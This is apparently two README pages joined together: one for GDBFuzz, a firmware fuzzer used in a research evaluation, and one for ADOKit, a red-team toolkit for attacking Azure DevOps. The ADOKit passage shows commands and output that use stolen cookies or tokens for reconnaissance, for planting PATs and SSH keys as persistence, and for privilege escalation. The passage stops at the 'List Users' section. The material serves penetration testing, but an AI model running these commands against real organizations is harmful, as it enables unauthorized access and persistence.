The general effectiveness of our approach is shown in a large scale benchmark deployed as docker containers.

make dockerimage

To run the above experiment in the docker container (for one hour as specified in the config file), map the example_programsand output folder as volumes and start GDBFuzz as follows.

chmod a+x ./example_programs/json-2017-02-12
docker run -it --env CONFIG_FILE=/example_programs/fuzz_json_docker_qemu.cfg -v $(pwd)/example_programs:/example_programs -v $(pwd)/output:/output gdbfuzz:1.0

An output folder should appear in the current working directory with the structure explained above.

Detailed Instructions

Our evaluation is split in two parts. 1. GDBFuzz on its intended setup, directly on the hardware. 2. GDBFuzz in an emulated environment to allow independend analysis and comparisons of the results.

GDBFuzz can work with any GDB server and therefore most debug probes for microcontrollers.

GDBFuzz vs. Blackbox (RQ1)

Regarding RQ1 from the paper, we execute GDBFuzz on different microcontrollers with different firmwares located in example_firmware. For each experiment we run GDBFuzz with the RandomBasicBlock and with the RandomBasicBlockNoCorpus strategy. The latter behaves like fuzzing without feedback, but we can still measure the achieved coverage. For answering RQ1, we compare the achieved coverage of the RandomBasicBlock and the RandomBasicBlockNoCorpus strategy. Respective config files are in the corresponding subfolders and we now explain how to setup fuzzing on the four development boards.

GDBFuzz on STM32 B-L4S5I-IOT01A board

GDBFuzz requires access to a GDB Server. In this case the B-L4S5I-IOT01A and its on-board debugger are used. This on-board debugger sets up a GDB server via the 'st-util' program, and enables access to this GDB server via localhost:4242.

  • Install the STLINK driver link
  • Connect MCU board and PC via USB (on MCU board, connect to the USB connector that is labeled as 'USB STLINK')
sudo apt-get install stlink-tools gdb-multiarch

Build and flash a firmware for the STM32 B-L4S5I-IOT01A, for example the arduinojson project.

Prerequisite: Install platformio (pio)

cd ./example_firmware/stm32_disco_arduinojson/
pio run --target upload

For your info: platformio stored an .elf file of the SUT here: ./example_firmware/stm32_disco_arduinojson/.pio/build/disco_l4s5i_iot01a/firmware.elf This .elf file is also later used in the user configuration for Ghidra.

Start a new terminal, and run the following to start the a GDB Server:

st-util

Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyACM0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyACM0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/stm32_disco_arduinojson/fuzz_serial_json.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on the CY8CKIT-062-WiFi-BT board

Install pyocd:

pip install --upgrade pip 'mbed-ls>=1.7.1' 'pyocd>=0.16'

Make sure that 'KitProg v3' is on the device and put Board into 'Arm DAPLink' Mode by pressing the appropriate button. Start the GDB server:

pyocd gdbserver --persist

Flash a firmware and start fuzzing e.g. with

gdb-multiarch
target remote :3333
load ./example_firmware/CY8CKIT_json/mtb-example-psoc6-uart-transmit-receive.elf
monitor reset
./src/GDBFuzz/main.py --config ./example_firmware/CY8CKIT_json/fuzz_serial_json.cfg

GDBFuzz on ESP32 and Segger J-Link

Build and flash a firmware for the ESP32, for instance the arduinojson example with platformio.

cd ./example_firmware/esp32_arduinojson/
pio run --target upload

Add following line to the openocd config file for the J-Link debugger: jlink.cfg

adapter speed 10000

Start a new terminal, and run the following to start the GDB Server:

get_idf
openocd -f interface/jlink.cfg -f target/esp32.cfg -c "telnet_port 7777" -c "gdb_port 8888"

Run GDBFuzz with a user configuration for arduinojson. We can send data over the usb port to the microcontroller. The microcontroller forwards this data via serial to the SUT'. In our case /dev/ttyUSB0 is the USB device to the microcontroller board. If your system assigned another device to the microcontroller board, change /dev/ttyUSB0 in the config file to your device.

./src/GDBFuzz/main.py --config ./example_firmware/esp32_arduinojson/fuzz_serial.cfg

Fuzzer statistics and logs are in the ./output/... directory.

GDBFuzz on MSP430F5529LP

Install TI MSP430 GCC from https://www.ti.com/tool/MSP430-GCC-OPENSOURCE

Start GDB Server

./gdb_agent_console libmsp430.so

or (more stable). Build mspdebug from https://github.com/dlbeer/mspdebug/ and use:

until mspdebug --fet-skip-close --force-reset tilib "opt gdb_loop True" gdb ; do sleep 1 ; done

Ghidra fails to analyze binaries for the TI MSP430 controller out of the box. To fix that, we import the file in the Ghidra GUI, choose MSP430X as architecture and skip the auto analysis. Next, we open the 'Symbol Table', sort them by name and delete all symbols with names like $C$L*. Now the auto analysis can be executed. After analysis, start the ghidra bridge from the Ghidra GUI manually and then start GDBFuzz.

./src/GDBFuzz/main.py --config ./example_firmware/msp430_arduinojson/fuzz_serial.cfg

USB Fuzzing

To access USB devices as non-root user with pyusb we add appropriate rules to udev. Paste following lines to /etc/udev/rules.d/50-myusb.rules:

SUBSYSTEM=="usb", ATTRS{idVendor}=="1234", ATTRS{idProduct}=="5678" GROUP="usbusers", MODE="666"

Reload udev:

sudo udevadm control --reload
sudo udevadm trigger

Compare against Fuzzware (RQ2)

In RQ2 from the paper, we compare GDBFuzz against the emulation based approach Fuzzware. First we execute GDBFuzz and Fuzzware as described previously on the shipped firmware files. For each GDBFuzz experiment, we create a file with valid basic blocks from the control flow graph files as follows:

cut -d " " -f1 ./cfg > valid_bbs.txt

Now we can replay coverage against fuzzware result fuzzware genstats --valid-bb-file valid_bbs.txt

Finding Bugs (RQ3)

When crashing or hanging inputs are found, the are stored in the crashes folder. During evaluation, we found the following three bugs:

  1. An infinite loop in the STM32 USB device stack, caused by counting a uint8_t index variable to an attacker controllable uint32_t variable within a for loop.
  2. A buffer overflow in the Cypress JSON parser, caused by missing length checks on a fixed size internal buffer.
  3. A null pointer dereference in the Cypress JSON parser, caused by missing validation checks.

GDBFuzz on an Raspberry Pi 4a (8Gb)

GDBFuzz can also run on a Raspberry Pi host with slight modifications:

  1. Ghidra must be modified, such that it runs on an 32-Bit OS

In file ./dependencies/ghidra/support/launch.sh:125 The JAVA_HOME variable must be hardcoded therefore e.g. to JAVA_HOME="/usr/lib/jvm/default-java"

  1. STLink must be at version >= 1.7 to work properly -> Build from sources

GDBFuzz on other boards

To fuzz software on other boards, GDBFuzz requires

  1. A microcontroller with hardware breakpoints and a GDB compliant debug probe
  2. The firmware file.
  3. A running GDBServer and suitable GDB application.
  4. An entry point, where fuzzing should start e.g. a parser function or an address
  5. An input interface (see src/GDBFuzz/connections) that triggers execution of the code at the entry point e.g. serial connection

All these properties need to be specified in the config file.

Run the full Benchmark (RQ4 - 8)

For RQ's 4 - 8 we run a large scale benchmark. First, build the Docker image as described previously and compile applications from Google's Fuzzer Test Suite with our fuzzing harness in benchmark/benchSUTs/GDBFuzz_wrapper/common.

cd ./benchmark/benchSUTs
chmod a+x setup_benchmark_SUTs.py
make dockerbenchmarkimage

Next adopt the benchmark settings in benchmark/scripts/benchmark.py and benchmark/scripts/benchmark_aflpp.py to your demands (especially number_of_cores, trials, and seconds_per_trial) and start the benchmark with:

cd ./benchmark/scripts
./benchmark.py $(pwd)/../benchSUTs/SUTs/ SUTs.json
./benchmark_aflpp.py $(pwd)/../benchSUTs/SUTs/ SUTs.json

A folder appears in ./benchmark/scripts that contains plot files (coverage over time), fuzzer statistic files, and control flow graph files for each experiment as in evaluation/fuzzer_test_suite_qemu_runs.

[Optional] Install Visualization and Visualization Example

GDBFuzz has an optional feature where it plots the control flow graph of covered nodes. This is disabled by default. You can enable it by following the instructions of this section and setting 'enable_UI' to 'True' in the user configuration.

On the host:

Install

sudo apt-get install graphviz

Install a recent version of node, for example Option 2 from here. Use Option 2 and not option 1. This should install both node and npm. For reference, our version numbers are (but newer versions should work too):

➜ node --version
v16.9.1
➜ npm --version
7.21.1

Install web UI dependencies:

cd ./src/webui
npm install

Install mosquitto MQTT broker, e.g. see here

Update the mosquitto broker config: Replace the file /etc/mosquitto/conf.d/mosquitto.conf with the following content:

listener 1883
allow_anonymous true

listener 9001
protocol websockets

Restart the mosquitto broker:

sudo service mosquitto restart

Check that the mosquitto broker is running:

sudo service mosquitto status

The output should include the text 'Active: active (running)'

Start the web UI:

cd ./src/webui
npm start

Your web browser should open automatically on 'http://localhost:3000/'.

Start GDBFuzz and use a user config file where enable_UI is set to True. You can use the Docker container and arduinojson SUT from above. But make sure to set 'enable_UI' to 'True'.

The nodes covered in 'blue' are covered. White nodes are not covered. We only show uncovered nodes if their parent is covered (drawing the complete control flow graph takes too much time if the control flow graph is large).



ADOKit - Azure DevOps Services Attack Toolkit


Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


Installation/Building

Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Fody https://github.com/Fody/Fody MIT License
Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

Pre-Compiled

  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL https://api.nuget.org/v3/index.json
  • Install the Costura.Fody NuGet package.
  • Install-Package Costura.Fody -Version 3.3.3
  • Install the Newtonsoft.Json package
  • Install-Package Newtonsoft.Json
  • You can now build the project yourself!

Command Modules

  • Recon
  • check - Check whether organization uses Azure DevOps and if credentials are valid
  • whoami - List the current user and its group memberships
  • listrepo - List all repositories
  • searchrepo - Search for given repository
  • listproject - List all projects
  • searchproject - Search for given project
  • searchcode - Search for code containing a search term
  • searchfile - Search for file based on a search term
  • listuser - List users
  • searchuser - Search for a given user
  • listgroup - List groups
  • searchgroup - Search for a given group
  • getgroupmembers - List all group members for a given group
  • getpermissions - Get the permissions for who has access to a given project
  • Persistence
  • createpat - Create personal access token for user
  • listpat - List personal access tokens for user
  • removepat - Remove personal access token for user
  • createsshkey - Create public SSH key for user
  • listsshkey - List public SSH keys for user
  • removesshkey - Remove public SSH key for user
  • Privilege Escalation
  • addprojectadmin - Add a user to the "Project Administrators" for a given project
  • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
  • addbuildadmin - Add a user to the "Build Administrators" group for a given project
  • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
  • addcollectionadmin - Add a user to the "Project Collection Administrators" group
  • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
  • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
  • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
  • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
  • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
  • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
  • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
  • getpipelinevars - Retrieve any pipeline variables used for a given project.
  • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
  • getserviceconnections - Retrieve the service connections used for a given project.

Arguments/Options

  • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
  • /url: - Azure DevOps URL. Applicable to all modules.
  • /search: - Keyword to search for. Not applicable to all modules.
  • /project: - Project to perform an action for. Not applicable to all modules.
  • /user: - Perform an action against a specific user. Not applicable to all modules.
  • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
  • /group: - Perform an action against a specific group. Not applicable to all modules.

Authentication Options

Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

  • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
  • /credential:UserAuthentication=ABC123
  • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
  • /credential:apiToken

Module Details Table

The below table shows the permissions required for each module.

Attack Scenario Module Special Permissions? Notes
Recon check No
Recon whoami No
Recon listrepo No
Recon searchrepo No
Recon listproject No
Recon searchproject No
Recon searchcode No
Recon searchfile No
Recon listuser No
Recon searchuser No
Recon listgroup No
Recon searchgroup No
Recon getgroupmembers No
Recon getpermissions No
Persistence createpat No
Persistence listpat No
Persistence removepat No
Persistence createsshkey No
Persistence listsshkey No
Persistence removesshkey No
Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

Examples

Validate Azure DevOps Access

Use Case

Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

Syntax

Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/28/2023 3:33:01 PM
==================================================


[*] INFO: Checking if organization provided uses Azure DevOps

[+] SUCCESS: Organization provided exists in Azure DevOps


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

3/28/23 19:33:02 Finished execution of check

Whoami

Use Case

Get the current user and the user's group memberhips

Syntax

Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 11:33:12 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | [email protected]. com


[*] INFO: Listing group memberships for the current user


Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

4/4/23 15:33:19 Finished execution of whoami

List Repos

Use Case

Discover repositories being used in Azure DevOps instance

Syntax

Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 8:41:50 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 12:41:53 Finished execution of listrepo

Search Repos

Use Case

Search for repositories by repository name in Azure DevOps instance

Syntax

Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 9:26:57 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

3/29/23 13:26:59 Finished execution of searchrepo

List Projects

Use Case

Discover projects being used in Azure DevOps instance

Syntax

Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:44:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject

4/4/23 11:45:04 Finished execution of listproject

Search Projects

Use Case

Search for projects by project name in Azure DevOps instance

Syntax

Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

Example Output

C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/4/2023 7:45:30 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

4/4/23 11:45:31 Finished execution of searchproject

Search Code

Use Case

Search for code containing a given keyword in Azure DevOps instance

Syntax

Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

Example Output

C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 3:22:21 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it

[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");

[*] Match count : 3

3/29/23 19:22:22 Finished execution of searchco de

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in Azure DevOps

Syntax

Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

Example Output

C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/29/2023 11:28:34 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

3/29/23 15:28:37 Finished execution of searchfile

Create PAT

Use Case

Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:09 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

3/31/23 18:33:10 Finished execution of createpat

List PATs

Use Case

List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.

Syntax

Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 3/31/2023 2:33:17 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

3/31/23 18:33:18 Finished execution of listpat

Remove PAT

Use Case

Remove a PAT for a given user in an Azure DevOps instance.

Syntax

Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:04:59 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

4/3/23 15:05:00 Finished execution of removepat

Create SSH Key

Use Case

Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

Syntax

Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

Example Output

C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 2:51:22 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

4/3/23 18:51:24 Finished execution of createsshkey

List SSH Keys

Use Case

List all public SSH keys for a given user in an Azure DevOps instance.

Syntax

Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

Example Output

C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 11:37:10 AM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 15:37:11 Finished execution of listsshkey

Remove SSH Key

Use Case

Remove an SSH key for a given user in an Azure DevOps instance.

Syntax

Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id: argument. This will output whether SSH key was removed or not, and then will list the current active SSH key's for the user after performing the removal.

ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

Example Output

C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97

==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization

Timestamp: 4/3/2023 1:50:08 PM
==================================================


[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.


[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.

SSH Key ID | Name | Scope | Valid Until | Public SSH Key
---------------------------------------------------------------------------------------------------------------------------------------------- -------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=

4/3/23 17:50:09 Finished execution of removesshkey

List Users

Use Case

List users within an Azure DevOps instance

Syntax

